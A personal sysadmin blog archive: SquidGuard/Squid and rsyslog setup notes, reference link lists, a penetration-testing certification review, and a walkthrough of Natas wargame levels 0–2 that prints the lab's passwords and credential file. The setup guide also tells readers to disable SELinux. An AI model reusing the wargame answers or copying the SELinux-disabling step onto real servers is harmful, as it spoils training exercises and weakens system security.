Thursday, 19 April 2018

Installing SquidGuard on CentOS 7.x

Get Berkeley DB 4.6.21:
wget http://download.oracle.com/berkeley-db/db-4.6.21.tar.gz

cd db-46..
cd build_unix
../dist/configure 
make
make install

ln -s /usr/local/BerkeleyDB.4.6 /usr/local/BerkeleyDB


export LD_RUN_PATH=/usr/local/BerkeleyDB/lib
./configure
make
make install

Get the blacklist from here:
http://www.shalla.de/service.html

Link the static lists into the squidGuard db directory:
ln -s /opt/3rdparty/BL/anonvpn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/hacking /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/dating /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/gamble /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/movies /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/music /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/porn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/sex /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/spyware /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/tracker /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/urlshortener /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/violence /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/warez /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/weapons /usr/local/squidGuard/db

SquidGuard configuration:
dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest anonvpn{
         log             anonvpn
         domainlist      anonvpn/domains
         urllist         anonvpn/urls
 }

dest hacking{
         log             hacking
         domainlist      hacking/domains
         urllist         hacking/urls
 }

dest dating{
         log             dating
         domainlist      dating/domains
         urllist         dating/urls
 }


dest gamble{
         log             gamble
         domainlist      gamble/domains
         urllist         gamble/urls
 }

dest movies{
         log             movies
         domainlist      movies/domains
         urllist         movies/urls
 }

dest music{
         log             music
         domainlist      music/domains
         urllist         music/urls
 }

dest porn{
         log             porn
         domainlist      porn/domains
         urllist         porn/urls
 }



dest spyware{
         log             spyware
         domainlist      spyware/domains
         urllist         spyware/urls
 }

dest tracker{
         log             tracker
         domainlist      tracker/domains
         urllist         tracker/urls
 }

dest urlshortener{
         log             urlshortener
         domainlist      urlshortener/domains
         urllist         urlshortener/urls
 }

dest violence{
         log             violence
         domainlist      violence/domains
         urllist         violence/urls
 }

dest warez{
         log             warez
         domainlist      warez/domains
         urllist         warez/urls
 }

dest weapons{
         log             weapons
         domainlist      weapons/domains
         urllist         weapons/urls
 }


acl {
  default {
   pass !anonvpn !hacking !dating !gamble !movies !music !porn !spyware !tracker !urlshortener !violence !warez !weapons all
   redirect 302:http://www.google.com
  }
 }
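
An added consistency check for the configuration above (example code, not part of the original post): it parses the `dest` blocks and `pass` rules and compares them with the directories linked into dbhome. The function names and the inline sample are constructed for illustration; on the page's own data it reports that `sex` is linked but has no `dest` block, so that list is never applied.

```python
import re

# squidGuard's built-in pass targets; they need no dest block.
BUILTINS = {"all", "any", "none", "in-addr"}

# Constructed sample data mirroring the steps above: the 14 directories linked
# into dbhome, and the 13 categories that have a dest block in the config.
LINKED = ["anonvpn", "hacking", "dating", "gamble", "movies", "music", "porn",
          "sex", "spyware", "tracker", "urlshortener", "violence", "warez",
          "weapons"]
DEFINED = [c for c in LINKED if c != "sex"]


def build_sample_conf(categories):
    """Rebuild a squidGuard.conf in the same shape as the one on the page."""
    parts = ["dbhome /usr/local/squidGuard/db",
             "logdir /usr/local/squidGuard/log", ""]
    for c in categories:
        parts += [f"dest {c}{{",
                  f"    log        {c}",
                  f"    domainlist {c}/domains",
                  f"    urllist    {c}/urls",
                  "}", ""]
    parts += ["acl {", "  default {",
              "    pass " + " ".join("!" + c for c in categories) + " all",
              "    redirect 302:http://www.google.com",
              "  }", "}"]
    return "\n".join(parts)


def parse_conf(conf):
    """Return ({dest name: [list file paths]}, [tokens of each pass rule])."""
    conf = re.sub(r"#.*", "", conf)  # drop comments to end of line
    dests = {}
    for name, body in re.findall(r"\bdest\s+([\w-]+)\s*\{(.*?)\}", conf, re.S):
        dests[name] = re.findall(r"\b(?:domainlist|urllist)\s+(\S+)", body)
    pass_rules = [rule.split() for rule in
                  re.findall(r"^[ \t]*pass[ \t]+(.+)$", conf, re.M)]
    return dests, pass_rules


def audit(conf, linked_dirs):
    """Compare linked list directories, dest blocks and pass rules.

    Assumes a pure blocklist policy as on this page: every defined dest is
    expected to appear negated (!name) in every pass rule.
    """
    dests, pass_rules = parse_conf(conf)
    linked = set(linked_dirs)
    # Top-level directory of every domainlist/urllist path, relative to dbhome.
    used_dirs = {p.split("/")[0] for files in dests.values() for p in files}
    not_blocked, undefined = set(), set()
    if not pass_rules:
        not_blocked = set(dests)  # no pass rule at all: nothing is denied
    for tokens in pass_rules:
        negated = {t[1:] for t in tokens if t.startswith("!")}
        not_blocked |= set(dests) - negated
        undefined |= negated - set(dests) - BUILTINS
    return {
        "linked_not_defined": sorted(linked - used_dirs),
        "lists_not_linked": sorted(used_dirs - linked),
        "defined_not_blocked": sorted(not_blocked),
        "blocked_not_defined": sorted(undefined),
    }


if __name__ == "__main__":
    for finding, names in audit(build_sample_conf(DEFINED), LINKED).items():
        print(f"{finding}: {names}")
```

To check a live install, pass the text of squidGuard.conf and the output of `os.listdir()` on dbhome to `audit()`.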



Switch off SELinux in /etc/sysconfig/selinux. Enter:
# vi /etc/sysconfig/selinux

And set / update it as follows:
SELINUX=disabled

chkconfig squid on

You will have to compile the lists in order for squidGuard to work with them. Removing and compiling stuff from the DB:
cd /usr/local/squidGuard/db
grep -r "example.com"
cd /usr/local/bin/
./squidGuard -C movies/domains
service squid restart

In Squid config:
# Try connecting to first 25 ips of domain name
forward_max_tries 25
#squidGuard
redirect_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
url_rewrite_bypass off
url_rewrite_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
#debug_options ALL,1 29,1


Wednesday, 18 April 2018

Puppet Picks

Some great Puppet picks if you want to use Puppet, write modules for it, or install Foreman.

Modules:
https://forge.puppet.com/ghoneycutt?utf-8=%E2%9C%93&sort=&page=3
https://forge.puppet.com/saz/rsyslog
https://forge.puppet.com/puppetlabs/firewall
https://forge.puppet.com/razorsedge/network
https://www.youtube.com/channel/UC_BpuLm5IvV2tme4WSHEdgw
https://wiki.infn.it/progetti/cloud-areapd/best_practices/config_puppetrun

Writing modules:
http://www.bogotobogo.com/DevOps/Puppet/puppet_locking_user_accounts_deploying_sudoers_file.php
https://www.linode.com/docs/applications/puppet/create-puppet-module
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet

Installation:
http://prolinuxhub.com/install-forman-on-centos-7/
http://www.linuxtechi.com/install-and-configure-foreman-on-centos-7-x/
http://www.itzgeek.com/how-tos/linux/ubuntu-how-tos/install-foreman-on-centos-7-rhel-7-ubuntu-14-04-3.html
http://www.ehowstuff.com/disable-ipv6-on-redhat-centos-6-centos-7/
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet
https://ask.puppet.com/question/2451/how-do-you-change-the-runinterval/
https://linuxconfig.org/puppet-agent-exiting-no-certificate-found-and-waitforcert-is-disabled-solution
http://devopspy.com/devops/install-puppet-master-agent-on-centos-7/
http://opensourceforu.com/2011/01/data-centre-automation-puppet-resources-types-examples/
https://docs.puppet.com/puppet/latest/install_linux.html

Rsyslog UDP/TCP

There is a small but important catch when you configure rsyslog forwarding: the protocol is chosen by the prefix on the target at the end of the config. For classic UDP use a single @; for TCP use @@.

# The authpriv file has restricted access.
authpriv.*                                              /var/log/secure

# Log all the mail messages in one place.
mail.*                                                  -/var/log/maillog


# Log cron stuff
cron.*                                                  /var/log/cron

# Everybody gets emergency messages
*.emerg                                                 :omusrmsg:*

# Save news errors of level crit and higher in a special file.
uucp,news.crit                                          /var/log/spooler

# Save boot messages also to boot.log
local7.*                                                /var/log/boot.log

$ActionQueueFileName fwdRule1 # unique name prefix for spool files
$ActionQueueMaxDiskSpace 1g   # 1gb space limit (use as much as possible)
$ActionQueueSaveOnShutdown on # save messages to disk on shutdown
$ActionQueueType LinkedList   # run asynchronously
$ActionResumeRetryCount -1    # infinite retries if host is down
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
*.* @IP:514
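
The catch above as an added example (not part of the original post): a small Python check that reads legacy-syntax rsyslog rules and reports, for each forwarding action, whether `@` (UDP) or `@@` (TCP) is in effect and which `$Action*` settings apply to it. The sample config is constructed from the stanza above plus a TCP line using the placeholder address from its comment; the function names are illustrative.

```python
import re

# Legacy forwarding action: selector, whitespace, "@" (UDP) or "@@" (TCP),
# optional "(options)", then host (name, IPv4 or [IPv6]) and optional ":port".
FORWARD_RE = re.compile(
    r"^(?P<selector>\S+)\s+(?P<at>@{1,2})(?:\((?P<opts>[^)]*)\))?"
    r"(?P<host>\[[^\]]+\]|[^:\s@(]+)(?::(?P<port>\d+))?$")

SAMPLE_CONF = """\
# Constructed sample: the page's forwarding stanza plus a TCP variant.
cron.*                                                  /var/log/cron
$ActionQueueFileName fwdRule1 # unique name prefix for spool files
$ActionQueueType LinkedList   # run asynchronously
$ActionResumeRetryCount -1    # infinite retries if host is down
*.* @IP:514
authpriv.* @@192.168.0.1
"""


def forwarding_rules(conf_text):
    """Return one dict per forwarding action found in legacy-format rules."""
    rules = []
    pending = {}  # $Action* directives waiting for the next action
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("$"):
            parts = line[1:].split(None, 1)
            if parts[0].startswith("Action"):
                pending[parts[0]] = parts[1] if len(parts) > 1 else ""
            continue
        # Any other line is a rule. Legacy $Action* directives apply to the
        # next action only, so they are consumed here whatever the action is.
        settings, pending = pending, {}
        m = FORWARD_RE.match(line)
        if not m:
            continue  # file, user-message or other non-forwarding action
        rules.append({
            "line": lineno,
            "selector": m.group("selector"),
            "transport": "udp" if m.group("at") == "@" else "tcp",
            "host": m.group("host"),
            "port": int(m.group("port") or 514),  # port is optional
            "options": m.group("opts") or "",
            "action_settings": settings,
        })
    return rules


def udp_forwarders(rules):
    """Forwarding actions that use the single-@ (UDP) form."""
    return [r for r in rules if r["transport"] == "udp"]


if __name__ == "__main__":
    for rule in forwarding_rules(SAMPLE_CONF):
        print(rule)
```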

References:
https://devops.profitbricks.com/tutorials/configure-remote-logging-with-rsyslog/
http://unix.stackexchange.com/questions/280697/rsyslog-not-forwarding-messages-to-remote-rsyslog-server
http://serverfault.com/questions/667728/configure-and-test-rsyslog-to-udp-socket
http://xmodulo.com/configure-rsyslog-client-centos.html

Tuesday, 10 October 2017

Microsoft Infrastructure Fundamentals

Some references I gathered over time on Microsoft Windows Administration.

Happy reading,
Yuriy

Server Limits Specifications:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx#physical_memory_limits_windows_server_2012

Logical CPU Limits:
https://blogs.technet.microsoft.com/matthts/2012/10/13/windows-server-sockets-logical-processors-symmetric-multi-threading/

Windows Server Comparison:
https://www.thomas-krenn.com/en/wiki/Windows_Server_2012_Editions_comparison


Articles:
Default gateways
https://technet.microsoft.com/en-us/library/cc779696(v=ws.10).aspx

DNSSEC:
https://technet.microsoft.com/en-us/library/jj200221.aspx

DNS Records:
https://technet.microsoft.com/en-us/library/cc958958.aspx

Domains:
https://technet.microsoft.com/en-us/library/cc780856(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/bb629410.aspx
https://technet.microsoft.com/en-us/library/dd197461
https://technet.microsoft.com/en-us/library/cc780661
https://technet.microsoft.com/en-us/library/cc730756
https://technet.microsoft.com/en-us/library/cc754345.aspx
https://technet.microsoft.com/en-us/library/cc725590.aspx
https://technet.microsoft.com/en-us/library/cc771255(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc755131.aspx
https://technet.microsoft.com/en-us/library/ee683907(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc753579.aspx

Zones:
https://technet.microsoft.com/en-us/library/cc771898.aspx
https://technet.microsoft.com/en-us/library/cc816885(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779197(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649181(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc775397(v=ws.10).aspx

Cache Locking:
https://technet.microsoft.com/en-us/library/ee649148(v=ws.10).aspx

IP Addresses:
https://technet.microsoft.com/en-us/library/cc958825.aspx
https://technet.microsoft.com/en-us/library/bb726995.aspx
https://technet.microsoft.com/en-us/library/cc958834.aspx
https://technet.microsoft.com/en-us/library/cc940018.aspx

DHCP:
https://technet.microsoft.com/en-us/library/cc738472(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc783103(WS.10).aspx
https://technet.microsoft.com/en-us/library/hh831825.aspx
https://technet.microsoft.com/en-us/library/cc958946.aspx
https://technet.microsoft.com/en-us/library/cc958935.aspx
http://www.tcpipguide.com/free/t_DHCPLeaseRenewalandRebindingProcesses-2.htm
http://www.thenetworkencyclopedia.com/entry/dynamic-host-configuration-protocol-dhcp/
https://technet.microsoft.com/en-us/library/cc779610(v=ws.10).aspx

What Are Domains and Forests?
https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx

Active Directory Administrative Center: Getting Started:
https://technet.microsoft.com/en-us/library/dd560651(v=ws.10).aspx

Understanding Sites, Subnets, and Site Links:
https://technet.microsoft.com/en-us/library/cc754697.aspx

Privileged Access Management for Active Directory Domain Services:
https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services

Install and Deploy Windows Server 2012 R2 and Windows Server 2012:
https://technet.microsoft.com/en-us/library/hh831620.aspx

Migrating Roles and Features in Windows Server:
https://technet.microsoft.com/en-us/windowsserver/jj554790.aspx

Linking GPOs to Active Directory Containers:
https://msdn.microsoft.com/en-us/library/aa374339(v=vs.85).aspx

Designing OU Structures that Work:
https://technet.microsoft.com/en-us/magazine/2008.05.oudesign.aspx

Active Directory Best Practice: OUs and Containers:
http://www.trivalentgroup.com/2015/11/active-directory-best-practice-ous-and-containers/

Active Directory Schema Tools and Settings
https://technet.microsoft.com/en-us/library/cc757747(v=ws.10).aspx

What Is the Global Catalog?
https://technet.microsoft.com/en-us/library/cc728188(v=ws.10).aspx

What Is the Active Directory Schema?
https://technet.microsoft.com/en-us/library/cc784826(v=ws.10).aspx

Resets the Directory Services Restore Mode (DSRM) password
https://technet.microsoft.com/en-us/library/cc754363(v=ws.11).aspx

Performing an Authoritative Restore:
https://technet.microsoft.com/en-us/library/cc940334.aspx

Performing a Nonauthoritative Restore of a Domain Controller
https://technet.microsoft.com/en-us/library/cc784922(v=ws.10).aspx

Understanding Trusts:
https://technet.microsoft.com/en-us/library/cc736874(v=ws.10).aspx

Ntdsutil
https://technet.microsoft.com/en-us/library/cc753343.aspx

Server Manager Technical Overview:
https://technet.microsoft.com/en-us/library/cc753319.aspx

Managing Windows Server 2012 and Windows Server 2012 R2 with Remote Server Administration Tools:
https://blogs.technet.microsoft.com/ausoemteam/2015/03/21/managing-windows-server-2012-and-windows-server-2012-r2-with-remote-server-administration-tools/

Recovering Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816751(v=ws.10).aspx

Requirements for Active Directory Recycle Bin:
https://technet.microsoft.com/en-us/library/dd379484(v=ws.10).aspx

Active Directory Recycle Bin Step-by-Step Guide:
https://technet.microsoft.com/en-us/library/dd392261(v=ws.10).aspx

Group types:
https://technet.microsoft.com/en-us/library/cc781446(v=ws.10).aspx

Default groups:
https://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx

Nesting groups:
https://technet.microsoft.com/en-us/library/cc776499(v=ws.10).aspx

Active Directory Security Groups:
https://technet.microsoft.com/en-us/library/dn579255(v=ws.11).aspx

Managing Computers:
https://technet.microsoft.com/en-us/library/cc771682.aspx

Detailed Concepts: Secure Channel Explained
http://social.technet.microsoft.com/wiki/contents/articles/24644.detailed-concepts-secure-channel-explained.aspx

Group Policy Overview
https://technet.microsoft.com/en-us/library/hh831791.aspx

Performance Team Blog:
https://blogs.technet.microsoft.com/askperf/

SMB:
https://blogs.technet.microsoft.com/josebda/2013/10/02/windows-server-2012-r2-which-version-of-the-smb-protocol-smb-1-0-smb-2-0-smb-2-1-smb-3-0-or-smb-3-02-are-you-using/

Bitlocker:
https://technet.microsoft.com/en-us/library/cc766200%28v=ws.10%29.aspx

https://technet.microsoft.com/en-us/library/cc732774.aspx

https://technet.microsoft.com/en-us/library/jj679890.aspx

Storage Technologies:
https://technet.microsoft.com/en-us/library/dn610883.aspx
https://technet.microsoft.com/en-us/library/hh831739.aspx
https://blogs.technet.microsoft.com/josebda/2014/11/19/storage-spaces-survival-guide-links-to-presentations-articles-blogs-tools/
https://technet.microsoft.com/windows-server-docs/storage/storage-spaces/storage-spaces-direct-windows-server-2016
https://blogs.technet.microsoft.com/askpfeplat/2012/10/10/windows-server-2012-storage-spaces-is-it-for-you-could-be/
https://technet.microsoft.com/windows-server-docs/storage/software-defined-storage/storage-quality-of-service
https://technet.microsoft.com/en-us/library/hh831602.aspx


Hands on:

Deduplication:
https://blogs.technet.microsoft.com/canitpro/2013/04/29/step-by-step-enabling-data-deduplication-on-windows-server-2012-volumes/

iSCSI:
https://blogs.technet.microsoft.com/filecab/2012/05/21/introduction-of-iscsi-target-in-windows-server-2012/

Bitlocker:
http://accc.uic.edu/answer/how-do-i-configure-active-directory-store-bitlocker-recovery-information

DHCP:
https://technet.microsoft.com/en-us/library/cc732075.aspx
https://technet.microsoft.com/en-us/library/cc757682(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779507(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/dn425039.aspx
https://technet.microsoft.com/en-us/library/cc786474(v=ws.10).aspx
https://blogs.technet.microsoft.com/teamdhcp/2009/01/22/how-to-configure-split-scope-using-wizard/
https://blogs.technet.microsoft.com/teamdhcp/2012/09/03/dhcp-failover-hot-standby-mode/
http://www.serverlab.ca/tutorials/windows/network-services-windows/step-step-creating-windows-server-dhcp-scope/
https://technet.microsoft.com/en-us/library/dd759168(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

DNS:
https://technet.microsoft.com/en-us/library/cc754941
https://blogs.technet.microsoft.com/networking/2008/03/19/dont-be-afraid-of-dns-scavenging-just-be-patient/
https://technet.microsoft.com/en-us/library/ff807360(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc816657(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649174(v=ws.10).aspx

Storage Spaces: How to configure Storage Tiers with Windows Server 2012 R2:
https://blogs.technet.microsoft.com/askpfeplat/2013/10/20/storage-spaces-how-to-configure-storage-tiers-with-windows-server-2012-r2/

Installing and Configuring MPIO:
https://technet.microsoft.com/en-us/library/ee619752(v=ws.10).aspx

Installing and Configuring Microsoft iSCSI Initiator:
https://technet.microsoft.com/en-us/library/ee338480(v=ws.10).aspx

Switch between Full and Server Core in Windows Server 2012 using PowerShell 3.0:
https://blogs.technet.microsoft.com/puneetvig/2012/10/15/switch-between-full-and-server-core-in-windows-server-2012-using-powershell-3-0/

How to change default OU for computers in AD:
https://blogs.technet.microsoft.com/canitpro/

Install a New Windows Server 2012 Active Directory Child or Tree Domain (Level 200):
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/deploy/install-a-new-windows-server-2012-active-directory-child-or-tree-domain--level-200-

http://pc-addicts.com/server-2012-change-default-ou/

Step-by-Step: Enabling and Using Fine-Grained Password Policies in AD
https://blogs.technet.microsoft.com/canitpro/2013/05/29/step-by-step-enabling-and-using-fine-grained-password-policies-in-ad/

How To Enable the Active Directory Recycle Bin:
https://redmondmag.com/articles/2015/11/11/enable-the-active-directory-recycle-bin.aspx

Step-By-Step: Setting Up Active Directory Sites, Subnets & Site-Links
https://blogs.technet.microsoft.com/canitpro/2015/03/03/step-by-step-setting-up-active-directory-sites-subnets-site-links/

Getting Started with Nano Server:
https://technet.microsoft.com/windows-server-docs/compute/nano-server/getting-started-with-nano-server

Get started with Setup and Boot Event Collection
https://technet.microsoft.com/windows-server-docs/compute/get-started-with-setup-and-boot-event-collection

Evaluation:
https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012?wt.mc_id=DXLEX_EDX_INF500x

ADSI Edit (adsiedit.msc)
https://technet.microsoft.com/en-us/library/cc773354(v=ws.10).aspx

Remote Server Administration Tools for Windows 10

How to Install Service Manager on a Single Computer
https://technet.microsoft.com/en-us/library/hh519747(v=sc.12).aspx

Promoting DC:
https://www.interworks.com/blog/ijahanshahi/2014/01/06/promoting-windows-2012r2-server-domain-controller

Configure Remote Desktop Access on Windows 7 Systems:
https://technet.microsoft.com/en-us/magazine/ff404238.aspx

Special Identities
https://technet.microsoft.com/en-us/library/dn617202.aspx

PS AD DS:
https://technet.microsoft.com/en-us/library/hh852274(v=wps.630).aspx

Use the Wbadmin Backup Command Line Utility in Windows Server 2008:
https://technet.microsoft.com/en-us/magazine/dd767786.aspx

Backing Up Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816584(v=ws.10).aspx

Offline Domain Join (Djoin.exe) Step-by-Step Guide
https://technet.microsoft.com/en-us/library/offline-domain-join-djoin-step-by-step(v=ws.10).aspx

Delegate Permissions for Group Policy
https://technet.microsoft.com/en-us/library/dn789195.aspx

Create a new organizational unit
https://technet.microsoft.com/en-us/library/cc785077(v=ws.10).aspx

Creating the Security Group
https://technet.microsoft.com/en-us/library/cc732782(v=ws.10).aspx

Creating Roaming Profiles:
http://www.grouppolicy.biz/2010/08/best-practice-roaming-profiles-and-folder-redirection-a-k-a-user-virtualization/

PowerShell stuff:
https://technet.microsoft.com/en-us/library/ee617253.aspx
https://technet.microsoft.com/en-us/library/ee617258.aspx
https://technet.microsoft.com/en-us/library/ee617210.aspx
https://technet.microsoft.com/en-us/library/ee617245.aspx
https://technet.microsoft.com/en-us/library/jj574143.aspx
https://technet.microsoft.com/en-us/library/jj612821(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh826098(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj612803%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh826099%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh848689(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh848686(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh831434.aspx
https://technet.microsoft.com/en-us/library/hh848450.aspx
https://technet.microsoft.com/en-us/library/hh831700.aspx
https://technet.microsoft.com/windows-server-docs/networking/dns/what-s-new-in-dns-server
https://technet.microsoft.com/en-us/library/jj590751(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj590743(v=wps.630).aspx

Thursday, 3 August 2017

Review eLearnSecurity eJPT, eCPPT

I currently hold some penetration testing certifications from eLearnSecurity, having passed them:
  • eJPT
  • eCPPT


I would like to share my experience here. 

About the labs: they are quite different in approach compared to other certifications - the orientation is towards skills rather than CTF targets. Personally I found it a better choice, since you learn quite a lot in a very short time (if you are dedicated). Not having free time, my only option was to learn in the early morning, 6 am to 8 am. After holding the eJPT I was able to also pass the eCPPT within a month.

Most important takeaways during the learning process:
- Do all the labs.
- Try to automate tasks and repeat the labs with the automated tools you have created.
- Know the flaws of your tools.
- Document everything and be organized.
- Read.
- Advance.

Labs

During the labs I found that some of the tools I use have changed over time, to be specific Metasploit. There are lots of online resources regarding Metasploit so this is not a big issue, but it will waste your time if you have not done your research. For example, I was really surprised that some Windows post-exploitation tools are not supported anymore. So do your research in advance. Also try to understand how it can be done manually - for instance X tool does not work, as a workaround I can export registry key Y, decrypt password Z etc.

"This lab does not work as expected" - Find the reason why. This might happen, and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment and understand how the attack works locally; recreating situations helps a lot to understand the circumstances you are dealing with, and in most cases it can be just a setting you have overlooked.

Knowledge domains

In a nutshell, eJPT gives you the ground knowledge; eCPPT is a deep dive into the penetration testing world, and you also get to practice "Exploit Development" - which itself is a huge knowledge domain. Pivoting is also a technique you have to master: it is widely used and will also be of great advantage for yourself - you have to know how you can "move" between networks. All topics are widely covered both theoretically and practically; my advice would be to take the practical part more seriously.

As they state: 

eJPT:
  • Good knowledge of TCP/IP
  • Good knowledge of IP routing
  • Good knowledge of LAN protocols and devices
  • Good knowledge of HTTP and web technologies
  • Essential penetration testing processes and methodologies
  • Basic Vulnerability Assessment of Networks
  • Basic Vulnerability Assessment of Web Applications
  • Exploitation with Metasploit
  • Simple Web application Manual exploitation
  • Basic Information Gathering and Reconnaissance
  • Simple Scanning and Profiling the target

eCPPT:
  • Penetration testing processes and methodologies
  • Vulnerability Assessment of Networks
  • Vulnerability Assessment of Web Applications
  • Advanced Exploitation with Metasploit
  • Performing Attacks in Pivoting
  • Web application Manual exploitation
  • Information Gathering and Reconnaissance
  • Scanning and Profiling the target
  • Privilege escalation and Persistence
  • Exploit Development
  • Advanced Reporting skills and Remediation



Exams

Surprisingly fun, have not had that much fun in years. If you have done the labs you cannot go wrong. If you have issues during the lab you can reset it, but remember that you will have to re-exploit all of your targets - automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT, as far as I remember, you get 3 days; by my criteria 24 h for this level is more than enough. The eCPPT exam was really interesting; I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you will get to test your learned skills, so again do the labs - properly.

About the penetration testing report for eCPPT: the report is the most interesting part - you will have to organize all of your information and prepare a detailed analysis. It is best to get it done manually if you want to have a good report and pass the exam.

Tools

You are not limited in any way.




Thursday, 19 January 2017

Natas Level 0 to 10

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L0

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
                    <body>
                    <h1>natas0</h1>
                    <div id="content">
                    You can find the password for the next level on this page.

                    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
                    </div>
                    </body>
                    </html>

                     L1
                     Chrome -> Ctrl+U
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
                    <body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
                    <h1>natas1</h1>
                    <div id="content">
                    You can find the password for the
                    next level on this page, but rightclicking has been blocked!

                    <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
                    </div>
                    </body>
                    </html>

                    L2
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
                    <body>
                    <h1>natas2</h1>
                    <div id="content">
                    There is nothing on this page
                    <img src="files/pixel.png">
                    </div>
                    </body></html>

                    http://natas.labs.overthewire.org/js/wechall-data.js
                    var wechalldata = {
                        "natas0": 1,
                        "natas1": 2,
                        "natas2": 3,
                        "natas3": 4,
                        "natas4": 5,
                        "natas5": 6,
                        "natas6": 7,
                        "natas7": 8,
                        "natas8": 15,
                        "natas9": 14,
                        "natas10": 13,
                        "natas11": 12,
                        "natas12": 11,
                        "natas13": 10,
                        "natas14": 9,
                        "natas15": 16,
                        "natas16": 17,
                        "natas17": 18,
                        "natas18": 137,
                        "natas19": 138,
                        "natas20": 139,
                        "natas21": 140,
                        "natas22": 141,
                        "natas23": 142,
                        "natas24": 213,
                        "natas25": 214,
                        "natas26": 215,
                        "natas27": 216
                    }

                    http://natas2.natas.labs.overthewire.org/files/
                    [IMG] pixel.png 2016-06-25 11:58 303
                    [TXT] users.txt 2016-06-25 12:42 145

                    # username:password
                    alice:BYNdCesZqW
                    bob:jw2ueICLvT
                    charlie:G5vCxkVV3m
                    natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
                    eve:zo4mJWyNj2
                    mallory:9urtcpzBmH


